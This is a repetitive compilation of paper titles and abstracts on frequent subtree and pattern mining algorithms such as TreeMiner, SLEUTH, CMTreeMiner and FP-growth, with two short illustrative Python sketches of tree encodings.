Our experiments with both synthetic and real datasets against two known algorithms for mining induced and embedded subtrees, FREQT and TreeMiner, demonstrate the effectiveness and the efficiency of the technique. --- paper_title: IMB3 Miner: Mining Induced/Embedded Subtrees by Constraining the Level of Embedding paper_content: Tree mining has recently attracted a lot of interest in areas such as Bioinformatics, XML mining, Web mining, etc. We are mainly concerned with mining frequent induced and embedded subtrees. While more interesting patterns can be obtained when mining embedded subtrees, unfortunately mining such embedding relationships can be very costly. In this paper, we propose an efficient approach to tackle the complexity of mining embedded subtrees by utilizing a novel Embedding List representation, Tree Model Guided enumeration, and introducing the Level of Embedding constraint. Thus, when it is too costly to mine all frequent embedded subtrees, one can decrease the level of embedding constraint gradually up to 1, from which all the obtained frequent subtrees are induced subtrees. Our experiments with both synthetic and real datasets against two known algorithms for mining induced and embedded subtrees, FREQT and TreeMiner, demonstrate the effectiveness and the efficiency of the technique. --- paper_title: Efficiently Mining Frequent Embedded Unordered Trees paper_content: Mining frequent trees is very useful in domains like bioinformatics, web mining, mining semi-structured data, and so on. In this paper we introduce SLEUTH, an efficient algorithm for mining frequent, unordered, embedded subtrees in a database of labeled trees. The key contributions of our work are as follows: We give the first algorithm that enumerates all embedded, unordered trees. We propose a new equivalence class extension scheme to generate all candidate trees. We extend the notion of scope-list joins to compute frequency of unordered trees. We conduct performance evaluation on several synthetic and real datasets to show that SLEUTH is an efficient algorithm, which has performance comparable to TreeMiner, that mines only ordered trees. --- paper_title: UNI3 - efficient algorithm for mining unordered induced subtrees using TMG candidate generation paper_content: Semi-structured data sources are increasingly in use today because of their capability of representing information through more complex structures where semantics and relationships of data objects are more easily expressed. Extraction of frequent sub-structures from such data has found important applications in areas such as Bioinformatics, XML mining, Web mining, scientific data management etc. This paper is concerned with the task of mining frequent unordered induced subtrees from a database of rooted ordered labeled subtrees. Our previous work in the area of frequent subtree mining is characterized by the efficient tree model guided (TMG) candidate enumeration, where candidate subtrees conform to the data's underlying tree structure. We apply the same approach to the unordered case, motivated by the fact that in many applications of frequent subtree mining the order among siblings is not considered important. The proposed UNI3 algorithm considers both transaction based and occurrence match support. 
Synthetic and real world data are used to evaluate the time performance of our approach in comparison to the well known algorithms developed for the same problem --- paper_title: Discovering Frequent Agreement Subtrees from Phylogenetic Data paper_content: We study a new data mining problem concerning the discovery of frequent agreement subtrees (FASTs) from a set of phylogenetic trees. A phylogenetic tree, or phylogeny, is an unordered tree in which the order among siblings is unimportant. Furthermore, each leaf in the tree has a label representing a taxon (species or organism) name, whereas internal nodes are unlabeled. The tree may have a root, representing the common ancestor of all species in the tree, or may be unrooted. An unrooted phylogeny arises due to the lack of sufficient evidence to infer a common ancestor of the taxa in the tree. The FAST problem addressed here is a natural extension of the maximum agreement subtree (MAST) problem widely studied in the computational phylogenetics community. The paper establishes a framework for tackling the FAST problem for both rooted and unrooted phylogenetic trees using data mining techniques. We first develop a novel canonical form for rooted trees together with a phylogeny-aware tree expansion scheme for generating candidate subtrees level by level. Then, we present an efficient algorithm to find all FASTs in a given set of rooted trees, through an Apriori-like approach. We show the correctness and completeness of the proposed method. Finally, we discuss the extensions of the techniques to unrooted trees. Experimental results demonstrate that the proposed methods work well, and are capable of finding interesting patterns in both synthetic data and real phylogenetic trees. --- paper_title: Mining Induced and Embedded Subtrees in Ordered, Unordered, and Partially-Ordered Trees paper_content: Many data mining problems can be represented with non-linear data structures like trees. In this paper, we introduce a scalable algorithm to mine partially-ordered trees. Our algorithm, POTMiner, is able to identify both induced and embedded subtrees and, as special cases, it can handle both completely ordered and completely unordered trees (i.e. the particular situations existing algorithms address). --- paper_title: TRIPS and TIDES: new algorithms for tree mining paper_content: Recent research in data mining has progressed from mining frequent itemsets to more general and structured patterns like trees and graphs. In this paper, we address the problem of frequent subtree mining that has proven to be viable in a wide range of applications such as bioinformatics, XML processing, computational linguistics, and web usage mining. We propose novel algorithms to mine frequent subtrees from a database of rooted trees. We evaluate the use of two popular sequential encodings of trees to systematically generate and evaluate the candidate patterns. The proposed approach is very generic and can be used to mine embedded or induced subtrees that can be labeled, unlabeled, ordered, unordered, or edge-labeled. Our algorithms are highly cache-conscious in nature because of the compact and simple array-based data structures we use. Typically, L1 and L2 hit rates above 99% are observed. Experimental evaluation showed that our algorithms can achieve up to several orders of magnitude speedup on real datasets when compared to state-of-the-art tree mining algorithms. 
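The TRIPS and TIDES entry above evaluates "two popular sequential encodings of trees"; the most widely used encoding in this literature is the preorder label string with a backtrack marker (written as -1 or $). The sketch below is a minimal illustration in Python; the Node class and encode_tree function are invented names rather than code from any of the cited systems, and individual algorithms differ in details such as whether trailing backtrack symbols are kept.

```python
# Minimal sketch: depth-first (preorder) string encoding of a rooted,
# labeled, ordered tree, using -1 as the "move back up" marker.
# Node and encode_tree are hypothetical names, not from the cited papers.

class Node:
    def __init__(self, label, children=None):
        self.label = label
        self.children = children or []

def encode_tree(root):
    """Return the preorder encoding as a list of labels and -1 markers."""
    encoding = []
    def visit(node):
        encoding.append(node.label)   # enter the node
        for child in node.children:
            visit(child)
        encoding.append(-1)           # backtrack to the parent
    visit(root)
    return encoding

# Example: root 'A' with children 'B' (which has child 'D') and 'C'
t = Node('A', [Node('B', [Node('D')]), Node('C')])
print(encode_tree(t))   # ['A', 'B', 'D', -1, -1, 'C', -1, -1]
```

Because two ordered labeled trees are identical exactly when their encodings are equal, such strings can serve both as pattern identifiers during candidate generation and as keys during support counting.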
--- paper_title: To see the wood for the trees: mining frequent tree patterns paper_content: Various definitions and frameworks for discovering frequent trees in forests have been developed recently. At the heart of these frameworks lies the notion of matching, which determines if a pattern tree matches a tree in a data set. We compare four notions of tree matching for use in frequent tree mining and show how they are related to each other. Furthermore, we show how Zaki's TreeMinerV algorithm can be adapted to employ three of the four notions of tree matching. Experiments on synthetic and real world data highlight the differences between the matchings. --- paper_title: TreeFinder: a first step towards XML data mining paper_content: In this paper we consider the problem of searching frequent trees from a collection of tree-structured data modeling XML data. The TreeFinder algorithm aims at finding trees, such that their exact or perturbed copies are frequent in a collection of labelled trees. To cope with complexity issues, TreeFinder is correct but not complete: it finds a subset of actually frequent trees. The default of completeness is experimentally investigated on artificial medium size datasets; it is shown that TreeFinder reaches completeness or falls short for a range of experimental settings. --- paper_title: Mining Closed and Maximal Frequent Subtrees from Databases of Labeled Rooted Trees paper_content: Tree structures are used extensively in domains such as computational biology, pattern recognition, XML databases, computer networks, and so on. One important problem in mining databases of trees is to find frequently occurring subtrees. Because of the combinatorial explosion, the number of frequent subtrees usually grows exponentially with the size of frequent subtrees and, therefore, mining all frequent subtrees becomes infeasible for large tree sizes. We present CMTreeMiner, a computationally efficient algorithm that discovers only closed and maximal frequent subtrees in a database of labeled rooted trees, where the rooted trees can be either ordered or unordered. The algorithm mines both closed and maximal frequent subtrees by traversing an enumeration tree that systematically enumerates all frequent subtrees. Several techniques are proposed to prune the branches of the enumeration tree that do not correspond to closed or maximal frequent subtrees. Heuristic techniques are used to arrange the order of computation so that relatively expensive computation is avoided as much as possible. We study the performance of our algorithm through extensive experiments, using both synthetic data and data sets from real applications. The experimental results show that our algorithm is very efficient in reducing the search space and quickly discovers all closed and maximal frequent subtrees. --- paper_title: Efficient data mining for maximal frequent subtrees paper_content: A new type of tree mining is defined, which uncovers maximal frequent induced subtrees from a database of unordered labeled trees. A novel algorithm, PathJoin, is proposed. The algorithm uses a compact data structure, FST-Forest, which compresses the trees and still keeps the original tree structure. PathJoin generates candidate subtrees by joining the frequent paths in FST-Forest. Such candidate subtree generation is localized and thus substantially reduces the number of candidate subtrees. Experiments with synthetic data sets show that the algorithm is effective and efficient. 
--- paper_title: HybridTreeMiner: an efficient algorithm for mining frequent rooted trees and free trees using canonical forms paper_content: Tree structures are used extensively in domains such as computational biology, pattern recognition, XML databases, computer networks, and so on. In this paper, we present HybridTreeMiner, a computationally efficient algorithm that discovers all frequently occurring subtrees in a database of rooted unordered trees. The algorithm mines frequent subtrees by traversing an enumeration tree that systematically enumerates all subtrees. The enumeration tree is defined based on a novel canonical form for rooted unordered trees - the breadth-first canonical form (BFCF). By extending the definitions of our canonical form and enumeration tree to free trees, our algorithm can efficiently handle databases of free trees as well. We study the performance of our algorithms through extensive experiments based on both synthetic data and datasets from real applications. The experiments show that our algorithm is competitive in comparison to known rooted tree mining algorithms and is faster by one to two orders of magnitude compared to a known algorithm for mining frequent free trees. --- paper_title: Efficiently mining frequent trees in a forest: algorithms and applications paper_content: Mining frequent trees is very useful in domains like bioinformatics, Web mining, mining semistructured data, etc. We formulate the problem of mining (embedded) subtrees in a forest of rooted, labeled, and ordered trees. We present TREEMINER, a novel algorithm to discover all frequent subtrees in a forest, using a new data structure called scope-list. We contrast TREEMINER with a pattern matching tree mining algorithm (PATTERNMATCHER), and we also compare it with TREEMINERD, which counts only distinct occurrences of a pattern. We conduct detailed experiments to test the performance and scalability of these methods. We also use tree mining to analyze RNA structure and phylogenetics data sets from bioinformatics domain. --- paper_title: Discovering Frequent Substructures in Large Unordered Trees paper_content: In this paper, we study a frequent substructure discovery problem in semi-structured data. We present an efficient algorithm Unot that computes all frequent labeled unordered trees appearing in a large collection of data trees with frequency above a user-specified threshold. The keys of the algorithm are efficient enumeration of all unordered trees in canonical form and incremental computation of their occurrences. We then show that Unot discovers each frequent pattern T in O(kb^2 m) per pattern, where k is the size of T, b is the branching factor of the data trees, and m is the total number of occurrences of T in the data trees. --- paper_title: Efficiently Mining Frequent Embedded Unordered Trees paper_content: Mining frequent trees is very useful in domains like bioinformatics, web mining, mining semi-structured data, and so on. In this paper we introduce SLEUTH, an efficient algorithm for mining frequent, unordered, embedded subtrees in a database of labeled trees. The key contributions of our work are as follows: We give the first algorithm that enumerates all embedded, unordered trees. We propose a new equivalence class extension scheme to generate all candidate trees. We extend the notion of scope-list joins to compute frequency of unordered trees.
We conduct performance evaluation on several synthetic and real datasets to show that SLEUTH is an efficient algorithm, which has performance comparable to TreeMiner, that mines only ordered trees. --- paper_title: Dryade: a new approach for discovering closed frequent trees in heterogeneous tree databases paper_content: In this paper we present a novel algorithm for discovering tree patterns in a tree database. This algorithm uses a relaxed tree inclusion definition, making the problem more complex (checking tree inclusion is NP-complete), but allowing to mine highly heterogeneous databases. To obtain good performances, our DRYADE algorithm, discovers only closed frequent tree patterns. --- paper_title: AMIOT: induced ordered tree mining in tree-structured databases paper_content: Frequent subtree mining has become increasingly important in recent years. In this paper, we present AMIOT algorithm to discover all frequent ordered subtrees in a tree-structured database. In order to avoid the generation of infrequent candidate trees, we propose the techniques such as right-and-left tree join and serial tree extension. Proposed methods enumerate only the candidate trees with high probability of being frequent without any duplication. The experiments on synthetic dataset and XML database show that AMIOT reduces redundant candidate trees and outperforms FREQT algorithm by up to five times in execution time. --- paper_title: Indexing and mining free trees paper_content: Tree structures are used extensively in domains such as computational biology, pattern recognition, computer networks, and so on. We present an indexing technique for free trees and apply this indexing technique to the problem of mining frequent subtrees. We first define a novel representation, the canonical form, for rooted trees and extend the definition to free trees. We also introduce another concept, the canonical string, as a simpler representation for free trees in their canonical forms. We then apply our tree indexing technique to the frequent subtree mining problem and present FreeTreeMiner, a computationally efficient algorithm that discovers all frequently occurring subtrees in a database of free trees. We study the performance and the scalability of our algorithms through extensive experiments based on both synthetic data and datasets from two real applications: a dataset of chemical compounds and a dataset of Internet multicast trees. --- paper_title: TreeFinder: a first step towards XML data mining paper_content: In this paper we consider the problem of searching frequent trees from a collection of tree-structured data modeling XML data. The TreeFinder algorithm aims at finding trees, such that their exact or perturbed copies are frequent in a collection of labelled trees. To cope with complexity issues, TreeFinder is correct but not complete: it finds a subset of actually frequent trees. The default of completeness is experimentally investigated on artificial medium size datasets; it is shown that TreeFinder reaches completeness or falls short for a range of experimental settings. --- paper_title: A quickstart in frequent structure mining can make a difference paper_content: Given a database, structure mining algorithms search for substructures that satisfy constraints such as minimum frequency, minimum confidence, minimum interest and maximum frequency. Examples of substructures include graphs, trees and paths. For these substructures many mining algorithms have been proposed. 
In order to make graph mining more efficient, we investigate the use of the "quickstart principle", which is based on the fact that these classes of structures are contained in each other, thus allowing for the development of structure mining algorithms that split the search into steps of increasing complexity. We introduce the GrAph/Sequence/Tree extractiON ( Gaston ) algorithm that implements this idea by searching first for frequent paths, then frequent free trees and finally cyclic graphs. We investigate two alternatives for computing the frequency of structures and present experimental results to relate these alternatives. --- paper_title: Efficient mining of high branching factor attribute trees paper_content: In this paper, we present a new tree mining algorithm, DryadeParent, based on the hooking principle first introduced in Dryade (Termier et al, 2004). In the experiments, we demonstrate that the branching factor and depth of the frequent patterns to find are key factor of complexity for tree mining algorithms. We show that DryadeParent outperforms the current fastest algorithm, CMTreeMiner, by orders of magnitude on datasets where the frequent patterns have a high branching factor. --- paper_title: Frequent free tree discovery in graph data paper_content: In recent years, researchers in graph mining have been exploring linear paths as well as subgraphs as pattern languages. In this paper, we are investigating the middle ground between these two extremes: mining free (that is, unrooted) trees in graph data. The motivation for this is the need to upgrade linear path patterns, while avoiding complexity issues with subgraph patterns. Starting from such complexity considerations, we are defining free trees and their canonical form, before we present FreeTreeMiner, an algorithm making efficient use of this canonical form during search. Experiments with two datasets from the National Cancer Institute's Developmental Therapeutics Program (DTP), anti-HIV and anti-cancer screening data, are reported. --- paper_title: HybridTreeMiner: an efficient algorithm for mining frequent rooted trees and free trees using canonical forms paper_content: Tree structures are used extensively in domains such as computational biology, pattern recognition, XML databases, computer networks, and so on. In this paper, we present HybridTreeMiner, a computationally efficient algorithm that discovers all frequently occurring subtrees in a database of rooted unordered trees. The algorithm mines frequent subtrees by traversing an enumeration tree that systematically enumerates all subtrees. The enumeration tree is defined based on a novel canonical form for rooted unordered trees - the breadth-first canonical form (BFCF). By extending the definitions of our canonical form and enumeration tree to free trees, our algorithm can efficiently handle databases of free trees as well. We study the performance of our algorithms through extensive experiments based on both synthetic data and datasets from real applications. The experiments show that our algorithm is competitive in comparison to known rooted tree mining algorithms and is faster by one to two orders of magnitudes compared to a known algorithm for mining frequent free trees. --- paper_title: Efficiently mining frequent trees in a forest: algorithms and applications paper_content: Mining frequent trees is very useful in domains like bioinformatics, Web mining, mining semistructured data, etc. 
We formulate the problem of mining (embedded) subtrees in a forest of rooted, labeled, and ordered trees. We present TREEMINER, a novel algorithm to discover all frequent subtrees in a forest, using a new data structure called scope-list. We contrast TREEMINER with a pattern matching tree mining algorithm (PATTERNMATCHER), and we also compare it with TREEMINERD, which counts only distinct occurrences of a pattern. We conduct detailed experiments to test the performance and scalability of these methods. We also use tree mining to analyze RNA structure and phylogenetics data sets from bioinformatics domain. --- paper_title: To see the wood for the trees: mining frequent tree patterns paper_content: Various definitions and frameworks for discovering frequent trees in forests have been developed recently. At the heart of these frameworks lies the notion of matching, which determines if a pattern tree matches a tree in a data set. We compare four notions of tree matching for use in frequent tree mining and show how they are related to each other. Furthermore, we show how Zaki's TreeMinerV algorithm can be adapted to employ three of the four notions of tree matching. Experiments on synthetic and real world data highlight the differences between the matchings. --- paper_title: PrefixSpan: mining sequential patterns efficiently by prefix-projected pattern growth paper_content: Sequential pattern mining is an important data mining problem with broad applications. It is challenging since one may need to examine a combinatorially explosive number of possible subsequence patterns. Most of the previously developed sequential pattern mining methods follow the methodology of Apriori, which may substantially reduce the number of combinations to be examined. However, Apriori still encounters problems when a sequence database is large and/or when sequential patterns to be mined are numerous and/or long. We propose a novel sequential pattern mining method, called PrefixSpan (i.e., Prefix-projected Sequential pattern mining), which explores prefix-projection in sequential pattern mining. PrefixSpan mines the complete set of patterns but greatly reduces the efforts of candidate subsequence generation. Moreover, prefix-projection substantially reduces the size of projected databases and leads to efficient processing. Our performance study shows that PrefixSpan outperforms both the Apriori-based GSP algorithm and another recently proposed method, FreeSpan, in mining large sequence databases. --- paper_title: AMIOT: induced ordered tree mining in tree-structured databases paper_content: Frequent subtree mining has become increasingly important in recent years. In this paper, we present AMIOT algorithm to discover all frequent ordered subtrees in a tree-structured database. In order to avoid the generation of infrequent candidate trees, we propose the techniques such as right-and-left tree join and serial tree extension. Proposed methods enumerate only the candidate trees with high probability of being frequent without any duplication. The experiments on synthetic dataset and XML database show that AMIOT reduces redundant candidate trees and outperforms FREQT algorithm by up to five times in execution time. --- paper_title: Indexing and mining free trees paper_content: Tree structures are used extensively in domains such as computational biology, pattern recognition, computer networks, and so on. We present an indexing technique for free trees and apply this indexing technique to the problem of mining frequent subtrees.
We first define a novel representation, the canonical form, for rooted trees and extend the definition to free trees. We also introduce another concept, the canonical string, as a simpler representation for free trees in their canonical forms. We then apply our tree indexing technique to the frequent subtree mining problem and present FreeTreeMiner, a computationally efficient algorithm that discovers all frequently occurring subtrees in a database of free trees. We study the performance and the scalability of our algorithms through extensive experiments based on both synthetic data and datasets from two real applications: a dataset of chemical compounds and a dataset of Internet multicast trees. --- paper_title: Frequent free tree discovery in graph data paper_content: In recent years, researchers in graph mining have been exploring linear paths as well as subgraphs as pattern languages. In this paper, we are investigating the middle ground between these two extremes: mining free (that is, unrooted) trees in graph data. The motivation for this is the need to upgrade linear path patterns, while avoiding complexity issues with subgraph patterns. Starting from such complexity considerations, we are defining free trees and their canonical form, before we present FreeTreeMiner, an algorithm making efficient use of this canonical form during search. Experiments with two datasets from the National Cancer Institute's Developmental Therapeutics Program (DTP), anti-HIV and anti-cancer screening data, are reported. --- paper_title: Discovering Frequent Substructures in Large Unordered Trees paper_content: In this paper, we study a frequent substructure discovery problem in semi-structured data. We present an efficient algorithm Unot that computes all frequent labeled unordered trees appearing in a large collection of data trees with frequency above a user-specified threshold. The keys of the algorithm are efficient enumeration of all unordered trees in canonical form and incremental computation of their occurrences. We then show that Unot discovers each frequent pattern T in O(kb^2 m) per pattern, where k is the size of T, b is the branching factor of the data trees, and m is the total number of occurrences of T in the data trees. --- paper_title: MB3 Miner: mining eMBedded sub-TREEs using Tree Model Guided candidate generation paper_content: Tree mining has many useful applications in areas such as Bioinformatics, XML mining, Web mining, etc. In general, most of the formally represented information in these domains is a tree structured form. In this paper we focus on mining frequent embedded subtrees from databases of rooted labeled ordered subtrees. We propose a novel and unique embedding list representation that is suitable for describing embedded subtrees. This representation is completely different from the string-like or conventional adjacency list representation previously utilized for trees. We present the mathematical model of a breadth-first-search Tree Model Guided (TMG) candidate generation approach previously introduced in [8]. The key characteristic of the TMG approach is that it enumerates fewer candidates by ensuring that only valid candidates that conform to the structural aspects of the data are generated as opposed to the join approach. Our experiments with both synthetic and real-life datasets provide comparisons against one of the state-of-the-art algorithms, TreeMiner [15], and they demonstrate the effectiveness and the efficiency of the technique.
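Several entries in this list (the free tree indexing paper, HybridTreeMiner, Unot) rely on a canonical form for rooted unordered trees, i.e. a representation that stays the same when siblings are reordered. A common construction, sketched below in Python with made-up names, encodes each subtree recursively and sorts the sibling encodings; this conveys the general idea only and is not the exact BFCF or canonical-string definition used in the cited papers.

```python
# Illustrative sketch: depth-first canonical string for rooted, labeled,
# UNORDERED trees, represented here as (label, [children]) tuples.
# Sibling encodings are sorted recursively, so two trees that differ only
# in sibling order map to the same string. Generic idea only; not the
# exact canonical form construction of any cited algorithm.

def canonical_string(tree):
    label, children = tree
    child_codes = sorted(canonical_string(c) for c in children)
    # parentheses delimit a subtree; the label comes first
    return "(" + str(label) + "".join(child_codes) + ")"

# Two trees that differ only in the order of the children of 'A'
t1 = ('A', [('C', []), ('B', [('D', [])])])
t2 = ('A', [('B', [('D', [])]), ('C', [])])
assert canonical_string(t1) == canonical_string(t2)
print(canonical_string(t1))   # (A(B(D))(C))
```

Duplicate candidates produced by different extensions can then be detected simply by comparing canonical strings.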
--- paper_title: IMB3 Miner: Mining Induced/Embedded Subtrees by Constraining the Level of Embedding paper_content: Tree mining has recently attracted a lot of interest in areas such as Bioinformatics, XML mining, Web mining, etc. We are mainly concerned with mining frequent induced and embedded subtrees. While more interesting patterns can be obtained when mining embedded subtrees, unfortunately mining such embedding relationships can be very costly. In this paper, we propose an efficient approach to tackle the complexity of mining embedded subtrees by utilizing a novel Embedding List representation, Tree Model Guided enumeration, and introducing the Level of Embedding constraint. Thus, when it is too costly to mine all frequent embedded subtrees, one can decrease the level of embedding constraint gradually up to 1, from which all the obtained frequent subtrees are induced subtrees. Our experiments with both synthetic and real datasets against two known algorithms for mining induced and embedded subtrees, FREQT and TreeMiner, demonstrate the effectiveness and the efficiency of the technique. --- paper_title: Efficiently Mining Frequent Embedded Unordered Trees paper_content: Mining frequent trees is very useful in domains like bioinformatics, web mining, mining semi-structured data, and so on. In this paper we introduce SLEUTH, an efficient algorithm for mining frequent, unordered, embedded subtrees in a database of labeled trees. The key contributions of our work are as follows: We give the first algorithm that enumerates all embedded, unordered trees. We propose a new equivalence class extension scheme to generate all candidate trees. We extend the notion of scope-list joins to compute frequency of unordered trees. We conduct performance evaluation on several synthetic and real datasets to show that SLEUTH is an efficient algorithm, which has performance comparable to TreeMiner, that mines only ordered trees. --- paper_title: PrefixSpan: mining sequential patterns efficiently by prefix-projected pattern growth paper_content: Sequential pattern mining is an important data mining problem with broad applications. It is challenging since one may need to examine a combinatorially explosive number of possible subsequence patterns. Most of the previously developed sequential pattern mining methods follow the methodology of Apriori, which may substantially reduce the number of combinations to be examined. However, Apriori still encounters problems when a sequence database is large and/or when sequential patterns to be mined are numerous and/or long. We propose a novel sequential pattern mining method, called PrefixSpan (i.e., Prefix-projected Sequential pattern mining), which explores prefix-projection in sequential pattern mining. PrefixSpan mines the complete set of patterns but greatly reduces the efforts of candidate subsequence generation. Moreover, prefix-projection substantially reduces the size of projected databases and leads to efficient processing. Our performance study shows that PrefixSpan outperforms both the Apriori-based GSP algorithm and another recently proposed method, FreeSpan, in mining large sequence databases. --- paper_title: Mining Induced and Embedded Subtrees in Ordered, Unordered, and Partially-Ordered Trees paper_content: Many data mining problems can be represented with non-linear data structures like trees. In this paper, we introduce a scalable algorithm to mine partially-ordered trees.
Our algorithm, POTMiner, is able to identify both induced and embedded subtrees and, as special cases, it can handle both completely ordered and completely unordered trees (i.e. the particular situations existing algorithms address). --- paper_title: Mining Closed and Maximal Frequent Subtrees from Databases of Labeled Rooted Trees paper_content: Tree structures are used extensively in domains such as computational biology, pattern recognition, XML databases, computer networks, and so on. One important problem in mining databases of trees is to find frequently occurring subtrees. Because of the combinatorial explosion, the number of frequent subtrees usually grows exponentially with the size of frequent subtrees and, therefore, mining all frequent subtrees becomes infeasible for large tree sizes. We present CMTreeMiner, a computationally efficient algorithm that discovers only closed and maximal frequent subtrees in a database of labeled rooted trees, where the rooted trees can be either ordered or unordered. The algorithm mines both closed and maximal frequent subtrees by traversing an enumeration tree that systematically enumerates all frequent subtrees. Several techniques are proposed to prune the branches of the enumeration tree that do not correspond to closed or maximal frequent subtrees. Heuristic techniques are used to arrange the order of computation so that relatively expensive computation is avoided as much as possible. We study the performance of our algorithm through extensive experiments, using both synthetic data and data sets from real applications. The experimental results show that our algorithm is very efficient in reducing the search space and quickly discovers all closed and maximal frequent subtrees. --- paper_title: TRIPS and TIDES: new algorithms for tree mining paper_content: Recent research in data mining has progressed from mining frequent itemsets to more general and structured patterns like trees and graphs. In this paper, we address the problem of frequent subtree mining that has proven to be viable in a wide range of applications such as bioinformatics, XML processing, computational linguistics, and web usage mining. We propose novel algorithms to mine frequent subtrees from a database of rooted trees. We evaluate the use of two popular sequential encodings of trees to systematically generate and evaluate the candidate patterns. The proposed approach is very generic and can be used to mine embedded or induced subtrees that can be labeled, unlabeled, ordered, unordered, or edge-labeled. Our algorithms are highly cache-conscious in nature because of the compact and simple array-based data structures we use. Typically, L1 and L2 hit rates above 99% are observed. Experimental evaluation showed that our algorithms can achieve up to several orders of magnitude speedup on real datasets when compared to state-of-the-art tree mining algorithms. --- paper_title: Dryade: a new approach for discovering closed frequent trees in heterogeneous tree databases paper_content: In this paper we present a novel algorithm for discovering tree patterns in a tree database. This algorithm uses a relaxed tree inclusion definition, making the problem more complex (checking tree inclusion is NP-complete), but allowing to mine highly heterogeneous databases. To obtain good performances, our DRYADE algorithm, discovers only closed frequent tree patterns. 
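CMTreeMiner and DRYADE above restrict the output to closed and/or maximal frequent subtrees. The sketch below only illustrates the two definitions as a post-processing filter over an already-mined set of frequent patterns; the cited algorithms instead prune non-closed branches during enumeration. The helper is_subpattern, the pattern objects, and the toy data are all assumptions made for illustration.

```python
# Illustrative post-processing view of "closed" and "maximal" frequent
# patterns. Real algorithms (e.g. CMTreeMiner) prune while enumerating.
# is_subpattern(p, q) is an assumed containment test: True when p is a
# sub-pattern of q (including equality). Each pattern is assumed to
# appear once in the list, so identity distinguishes distinct patterns.

def closed_patterns(frequent, support, is_subpattern):
    """Keep patterns with no strictly larger super-pattern of equal support."""
    return [p for p in frequent
            if not any(q is not p and is_subpattern(p, q)
                       and support[q] == support[p] for q in frequent)]

def maximal_patterns(frequent, support, is_subpattern):
    """Keep patterns with no strictly larger frequent super-pattern at all."""
    return [p for p in frequent
            if not any(q is not p and is_subpattern(p, q) for q in frequent)]

# Toy usage with strings standing in for patterns and substring containment:
freq = ["ab", "abc", "b", "bc"]
supp = {"ab": 3, "abc": 3, "b": 5, "bc": 4}
sub = lambda p, q: p in q
print(closed_patterns(freq, supp, sub))   # ['abc', 'b', 'bc']
print(maximal_patterns(freq, supp, sub))  # ['abc']
```

The toy output also shows the usual containment relation between the two sets: every maximal pattern is closed, but not vice versa.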
--- paper_title: UNI3 - efficient algorithm for mining unordered induced subtrees using TMG candidate generation paper_content: Semi-structured data sources are increasingly in use today because of their capability of representing information through more complex structures where semantics and relationships of data objects are more easily expressed. Extraction of frequent sub-structures from such data has found important applications in areas such as Bioinformatics, XML mining, Web mining, scientific data management etc. This paper is concerned with the task of mining frequent unordered induced subtrees from a database of rooted ordered labeled subtrees. Our previous work in the area of frequent subtree mining is characterized by the efficient tree model guided (TMG) candidate enumeration, where candidate subtrees conform to the data's underlying tree structure. We apply the same approach to the unordered case, motivated by the fact that in many applications of frequent subtree mining the order among siblings is not considered important. The proposed UNI3 algorithm considers both transaction based and occurrence match support. Synthetic and real world data are used to evaluate the time performance of our approach in comparison to the well known algorithms developed for the same problem --- paper_title: Mining frequent patterns without candidate generation paper_content: Mining frequent patterns in transaction databases, time-series databases, and many other kinds of databases has been studied popularly in data mining research. Most of the previous studies adopt an Apriori-like candidate set generation-and-test approach. However, candidate set generation is still costly, especially when there exist prolific patterns and/or long patterns. In this study, we propose a novel frequent pattern tree (FP-tree) structure, which is an extended prefix-tree structure for storing compressed, crucial information about frequent patterns, and develop an efficient FP-tree-based mining method, FP-growth, for mining the complete set of frequent patterns by pattern fragment growth. Efficiency of mining is achieved with three techniques: (1) a large database is compressed into a highly condensed, much smaller data structure, which avoids costly, repeated database scans, (2) our FP-tree-based mining adopts a pattern fragment growth method to avoid the costly generation of a large number of candidate sets, and (3) a partitioning-based, divide-and-conquer method is used to decompose the mining task into a set of smaller tasks for mining confined patterns in conditional databases, which dramatically reduces the search space. Our performance study shows that the FP-growth method is efficient and scalable for mining both long and short frequent patterns, and is about an order of magnitude faster than the Apriori algorithm and also faster than some recently reported new frequent pattern mining methods. --- paper_title: TreeFinder: a first step towards XML data mining paper_content: In this paper we consider the problem of searching frequent trees from a collection of tree-structured data modeling XML data. The TreeFinder algorithm aims at finding trees, such that their exact or perturbed copies are frequent in a collection of labelled trees. To cope with complexity issues, TreeFinder is correct but not complete: it finds a subset of actually frequent trees. 
The default of completeness is experimentally investigated on artificial medium size datasets; it is shown that TreeFinder reaches completeness or falls short for a range of experimental settings. --- paper_title: Discovering Frequent Agreement Subtrees from Phylogenetic Data paper_content: We study a new data mining problem concerning the discovery of frequent agreement subtrees (FASTs) from a set of phylogenetic trees. A phylogenetic tree, or phylogeny, is an unordered tree in which the order among siblings is unimportant. Furthermore, each leaf in the tree has a label representing a taxon (species or organism) name, whereas internal nodes are unlabeled. The tree may have a root, representing the common ancestor of all species in the tree, or may be unrooted. An unrooted phylogeny arises due to the lack of sufficient evidence to infer a common ancestor of the taxa in the tree. The FAST problem addressed here is a natural extension of the maximum agreement subtree (MAST) problem widely studied in the computational phylogenetics community. The paper establishes a framework for tackling the FAST problem for both rooted and unrooted phylogenetic trees using data mining techniques. We first develop a novel canonical form for rooted trees together with a phylogeny-aware tree expansion scheme for generating candidate subtrees level by level. Then, we present an efficient algorithm to find all FASTs in a given set of rooted trees, through an Apriori-like approach. We show the correctness and completeness of the proposed method. Finally, we discuss the extensions of the techniques to unrooted trees. Experimental results demonstrate that the proposed methods work well, and are capable of finding interesting patterns in both synthetic data and real phylogenetic trees. --- paper_title: A quickstart in frequent structure mining can make a difference paper_content: Given a database, structure mining algorithms search for substructures that satisfy constraints such as minimum frequency, minimum confidence, minimum interest and maximum frequency. Examples of substructures include graphs, trees and paths. For these substructures many mining algorithms have been proposed. In order to make graph mining more efficient, we investigate the use of the "quickstart principle", which is based on the fact that these classes of structures are contained in each other, thus allowing for the development of structure mining algorithms that split the search into steps of increasing complexity. We introduce the GrAph/Sequence/Tree extractiON ( Gaston ) algorithm that implements this idea by searching first for frequent paths, then frequent free trees and finally cyclic graphs. We investigate two alternatives for computing the frequency of structures and present experimental results to relate these alternatives. --- paper_title: Efficient data mining for maximal frequent subtrees paper_content: A new type of tree mining is defined, which uncovers maximal frequent induced subtrees from a database of unordered labeled trees. A novel algorithm, PathJoin, is proposed. The algorithm uses a compact data structure, FST-Forest, which compresses the trees and still keeps the original tree structure. PathJoin generates candidate subtrees by joining the frequent paths in FST-Forest. Such candidate subtree generation is localized and thus substantially reduces the number of candidate subtrees. Experiments with synthetic data sets show that the algorithm is effective and efficient. ---
